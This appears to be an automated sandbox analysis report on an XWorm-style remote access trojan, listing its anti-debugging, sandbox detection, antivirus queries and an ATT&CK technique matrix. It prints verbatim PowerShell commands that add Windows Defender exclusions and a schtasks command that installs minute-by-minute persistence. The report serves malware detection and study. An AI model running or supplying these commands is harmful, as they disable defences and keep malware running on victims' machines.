                    Source: C:\Users\user\AppData\Roaming\Word.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Word.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Word.exeThread delayed: delay time: 922337203685477
                    Source: Word.exe.0.drBinary or memory string: vmware
                    Source: file.exe, 00000000.00000002.2560460536.000000001B240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFAAC487A71 CheckRemoteDebuggerPresent,0_2_00007FFAAC487A71
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"Jump to behavior
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Word.exeQueries volume information: C:\Users\user\AppData\Roaming\Word.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Word.exeQueries volume information: C:\Users\user\AppData\Roaming\Word.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Word.exeQueries volume information: C:\Users\user\AppData\Roaming\Word.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Word.exeQueries volume information: C:\Users\user\AppData\Roaming\Word.exe VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: file.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 5668, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: file.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 5668, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPED
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    OS Credential Dumping1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory23
                    System Information Discovery
                    Remote Desktop Protocol1
                    Screen Capture
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell
                    21
                    Registry Run Keys / Startup Folder
                    1
                    Scheduled Task/Job
                    2
                    Obfuscated Files or Information
                    Security Account Manager531
                    Security Software Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Registry Run Keys / Startup Folder
                    2
                    Software Packing
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets151
                    Virtualization/Sandbox Evasion
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
